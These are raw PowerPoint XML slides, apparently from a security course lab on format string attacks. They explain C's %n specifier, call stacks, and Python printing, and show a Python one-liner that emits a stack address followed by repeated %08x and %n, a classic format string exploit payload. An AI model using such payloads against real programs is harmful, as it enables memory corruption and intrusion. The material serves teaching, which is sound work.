              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" err="1"/>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t>&gt;                                                                &lt;output&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t>                                                                                                blah  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" err="1"/>
              <a:t>blah</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t> main()                                                                               </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" err="1"/>
              <a:t>val</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t> = 5</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t>{</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" err="1"/>
              <a:t>val</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t>("blah %n blah\n", &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" err="1"/>
              <a:t>val</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" err="1"/>
              <a:t>val</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t> = %d\n", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" err="1"/>
              <a:t>val</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t>  return 0;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="직사각형 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6003990" y="4580129"/>
            <a:ext cx="6096000" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:hlinkClick r:id="" action="ppaction://noaction"/>
              </a:rPr>
              <a:t>https://stackoverflow.com/questions/3401156/what-is-the-use-of-the-n-format-specifier-in-c</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="직사각형 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="144275" y="1556792"/>
            <a:ext cx="4968552" cy="3672408"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
              <a:alpha val="2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6023992" y="1536937"/>
            <a:ext cx="1728192" cy="1099975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
              <a:alpha val="2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부제목 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A05FE0C-E396-4533-B6CD-258F77786A94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="449078" y="5373216"/>
            <a:ext cx="5354171" cy="1139752"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="2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In the previous slides, we finished Solution Step 4. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t>Before proceeding to Step 5, we check 4 points.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t>One is %n format specifier in C Programming language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t>and one is Call Stack Sequence,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t>and the other is python usage.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t>And, finally </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t> usage.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" kern="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="부제목 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A05FE0C-E396-4533-B6CD-258F77786A94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6374904" y="5445224"/>
            <a:ext cx="5354171"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What is the use of the %n specifier in C?   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t>.... number of characters written so far is stored.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t>In this example, before %n specifier, 5 characters </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t>b  l  a  h       are written so 5 is stored into val.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" kern="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="직사각형 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6423787" y="6249842"/>
            <a:ext cx="186076" cy="250596"/>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6609863" y="6249842"/>
            <a:ext cx="186076" cy="250596"/>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6802018" y="6250446"/>
            <a:ext cx="186076" cy="250596"/>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6986222" y="6253214"/>
            <a:ext cx="186076" cy="250596"/>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7172512" y="6251173"/>
            <a:ext cx="186076" cy="250596"/>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1633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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="3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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="3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9">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>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Effect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="4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2" end="2"/>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animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="4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5" grpId="0" animBg="1"/>
      <p:bldP spid="12" grpId="0" animBg="1"/>
      <p:bldP spid="14" grpId="0" animBg="1"/>
      <p:bldP spid="16"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a:xfrm>
            <a:off x="131060" y="44624"/>
            <a:ext cx="12060940" cy="5184576"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="000000">
              <a:alpha val="40000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" b="1" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Call Stack Sequence</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" b="1" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t>call stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:hlinkClick r:id="rId3" tooltip="Stack (abstract data type)"/>
              </a:rPr>
              <a:t>stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:hlinkClick r:id="rId4" tooltip="Data structure"/>
              </a:rPr>
              <a:t>data structure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> that stores information</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> about the active </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:hlinkClick r:id="rId5" tooltip="Subroutine"/>
              </a:rPr>
              <a:t>subroutines</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:hlinkClick r:id="rId6" tooltip="Computer program"/>
              </a:rPr>
              <a:t>computer program</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="직사각형 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9105475" y="1842949"/>
            <a:ext cx="3048000" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=Q2sFmqvpBe0</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="부제목 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A05FE0C-E396-4533-B6CD-258F77786A94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="449078" y="5373216"/>
            <a:ext cx="5354171"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endParaRPr lang="ko-KR" altLang="en-US" sz="1400" kern="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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36391" y="2479959"/>
            <a:ext cx="2887811"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부제목 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A05FE0C-E396-4533-B6CD-258F77786A94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="551384" y="5626017"/>
            <a:ext cx="5354171" cy="1139752"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="1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Call stack .. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t>In this lab, we assume that you are familiar with call stack concept.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t>You can study call stack with yourself using Wiki call stack</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0" err="1"/>
              <a:t>youtube</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t> call stack clips.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t>If you have any comments or questions, please let us know.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" kern="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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31935" y="2479959"/>
            <a:ext cx="3999756" cy="2640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00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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="1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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="2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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="3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a:xfrm>
            <a:off x="131060" y="44624"/>
            <a:ext cx="12060940" cy="5184576"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="000000">
              <a:alpha val="40000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" b="1" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Python print</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> python –c ‘print “\xd0\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>xeb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>xbf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>”+”%08x%08x%08x%08x%08x%08x%08x%08x%08x%n”’</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" u="sng" dirty="0"/>
              <a:t>d0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" u="sng" dirty="0" err="1"/>
              <a:t>eb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" u="sng" dirty="0" err="1"/>
              <a:t>ff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" u="sng" dirty="0"/>
              <a:t>bf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>   %  0  8  x    %  0  8  x     %  0  8  x     %  0  8  x    %  0  8  x    %  0  8  x     %  0  8  x     %  0  8  x     %  0  8  x    %  n     </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>\x \x \x \x  c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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1"/>
              <a:t>c</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="부제목 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A05FE0C-E396-4533-B6CD-258F77786A94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="449078" y="5373216"/>
            <a:ext cx="5354171"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endParaRPr lang="ko-KR" altLang="en-US" sz="1400" kern="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="부제목 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A05FE0C-E396-4533-B6CD-258F77786A94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="551384" y="5626017"/>
            <a:ext cx="5354171"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Now, let’s check python print.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t>Here, \x means hexadecimal notation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t>So, this sentence print out ….</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" kern="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="표 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1894812545"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1487488" y="1772816"/>
          <a:ext cx="1444695" cy="3413760"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1444695">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="193868">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>4 bytes</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="193868">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
